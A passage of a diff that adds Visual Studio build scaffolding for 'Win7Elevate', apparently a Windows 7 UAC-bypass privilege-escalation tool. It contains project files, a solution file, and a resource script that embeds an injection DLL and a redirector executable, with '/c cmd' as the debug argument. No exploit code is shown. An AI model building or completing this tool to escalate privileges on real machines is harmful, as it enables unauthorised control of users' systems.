<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\CMMN.cpp" />
|
||||
<ClCompile Include="..\Redirector.cpp" />
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="TIOR.cpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,39 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="targetver.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="TIOR.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\CMMN.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\Redirector.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,3 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
</Project>
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// TIOR.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,16 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <tchar.h>
|
||||
|
||||
|
||||
|
||||
// TODO: reference additional headers your program requires here
|
||||
#include <assert.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
|
@ -0,0 +1,60 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 11.00
|
||||
# Visual Studio 2010
|
||||
Project("{2150E333-8FDC-42A3-9474-1A3956D46DE8}") = "Solution Items", "Solution Items", "{BB654285-1131-415D-B796-21045D32DF87}"
|
||||
ProjectSection(SolutionItems) = preProject
|
||||
Win7Elevate_v2_read_me.txt = Win7Elevate_v2_read_me.txt
|
||||
EndProjectSection
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TIOR", "TIOR\TIOR.vcxproj", "{B36517F4-984C-422C-ADF9-85D5ACD4E30B}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7ElevateDll", "Win7ElevateDll\Win7ElevateDll.vcxproj", "{A1814C92-4DA6-440C-811E-86016AB7433A}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\Win7Elevate.vcxproj", "{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}"
|
||||
ProjectSection(ProjectDependencies) = postProject
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A} = {A1814C92-4DA6-440C-811E-86016AB7433A}
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B} = {B36517F4-984C-422C-ADF9-85D5ACD4E30B}
|
||||
EndProjectSection
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
|
||||
Debug|Win32 = Debug|Win32
|
||||
Debug|x64 = Debug|x64
|
||||
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
|
||||
Release|Win32 = Release|Win32
|
||||
Release|x64 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
|
||||
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
|
||||
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
|
||||
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.Build.0 = Release|x64
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
|
@ -0,0 +1,18 @@
|
|||
//{{NO_DEPENDENCIES}}
|
||||
// Microsoft Visual C++ generated include file.
|
||||
// Used by Win7Elevate.rc
|
||||
//
|
||||
#define IDD_EMBEDDED_DLL 110
|
||||
#define IDD_EMBEDDED_TIOR 111
|
||||
|
||||
// Next default values for new objects
|
||||
//
|
||||
#ifdef APSTUDIO_INVOKED
|
||||
#ifndef APSTUDIO_READONLY_SYMBOLS
|
||||
#define _APS_NO_MFC 1
|
||||
#define _APS_NEXT_RESOURCE_VALUE 139
|
||||
#define _APS_NEXT_COMMAND_VALUE 32771
|
||||
#define _APS_NEXT_CONTROL_VALUE 1000
|
||||
#define _APS_NEXT_SYMED_VALUE 111
|
||||
#endif
|
||||
#endif
|
Binary file not shown.
|
@ -0,0 +1,82 @@
|
|||
// Microsoft Visual C++ generated resource script.
|
||||
//
|
||||
#include "resource.h"
|
||||
|
||||
#define APSTUDIO_READONLY_SYMBOLS
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
//
|
||||
// Generated from the TEXTINCLUDE 2 resource.
|
||||
//
|
||||
#ifndef APSTUDIO_INVOKED
|
||||
#include "targetver.h"
|
||||
#endif
|
||||
#define APSTUDIO_HIDDEN_SYMBOLS
|
||||
#include "windows.h"
|
||||
#undef APSTUDIO_HIDDEN_SYMBOLS
|
||||
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
#undef APSTUDIO_READONLY_SYMBOLS
|
||||
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
// English (U.S.) resources
|
||||
|
||||
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
|
||||
#ifdef _WIN32
|
||||
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
|
||||
#pragma code_page(1252)
|
||||
#endif //_WIN32
|
||||
|
||||
#ifdef APSTUDIO_INVOKED
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
//
|
||||
// TEXTINCLUDE
|
||||
//
|
||||
|
||||
1 TEXTINCLUDE
|
||||
BEGIN
|
||||
"resource.h\0"
|
||||
END
|
||||
|
||||
2 TEXTINCLUDE
|
||||
BEGIN
|
||||
"#ifndef APSTUDIO_INVOKED\r\n"
|
||||
"#include ""targetver.h""\r\n"
|
||||
"#endif\r\n"
|
||||
"#define APSTUDIO_HIDDEN_SYMBOLS\r\n"
|
||||
"#include ""windows.h""\r\n"
|
||||
"#undef APSTUDIO_HIDDEN_SYMBOLS\r\0"
|
||||
END
|
||||
|
||||
3 TEXTINCLUDE
|
||||
BEGIN
|
||||
"#include ""Win7Elevate.rc2\0"
|
||||
END
|
||||
|
||||
#endif // APSTUDIO_INVOKED
|
||||
|
||||
#endif // English (U.S.) resources
|
||||
/////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
|
||||
|
||||
#ifdef _DEBUG
|
||||
|
||||
#ifdef _WIN64
|
||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
|
||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
|
||||
#else
|
||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
|
||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
|
||||
#endif
|
||||
|
||||
#else // _DEBUG
|
||||
|
||||
#ifdef _WIN64
|
||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
|
||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
|
||||
#else
|
||||
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
|
||||
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
|
||||
#endif
|
||||
|
||||
#endif
|
|
@ -0,0 +1,212 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>Win7Elevate</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<MinimalRebuild>false</MinimalRebuild>
|
||||
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<MinimalRebuild>false</MinimalRebuild>
|
||||
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
<ResourceCompile>
|
||||
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ResourceCompile>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>false</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
|
||||
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
<ResourceCompile>
|
||||
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ResourceCompile>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Resource.h" />
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
<ClInclude Include="Win7Elevate_Inject.h" />
|
||||
<ClInclude Include="Win7Elevate_Utils.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\CMMN.cpp" />
|
||||
<ClCompile Include="..\Redirector.cpp" />
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Win7Elevate.cpp" />
|
||||
<ClCompile Include="Win7Elevate_Inject.cpp" />
|
||||
<ClCompile Include="Win7Elevate_Utils.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ResourceCompile Include="Win7Elevate.rc" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,59 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="targetver.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Win7Elevate_Inject.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Win7Elevate_Utils.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="Resource.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Win7Elevate.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Win7Elevate_Inject.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="Win7Elevate_Utils.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\CMMN.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\Redirector.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ResourceCompile Include="Win7Elevate.rc">
|
||||
<Filter>Resource Files</Filter>
|
||||
</ResourceCompile>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,14 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup>
|
||||
<ShowAllFiles>false</ShowAllFiles>
|
||||
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">/c cmd</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">/c cmd</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">WindowsLocalDebugger</DebuggerFlavor>
|
||||
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WindowsLocalDebugger</DebuggerFlavor>
|
||||
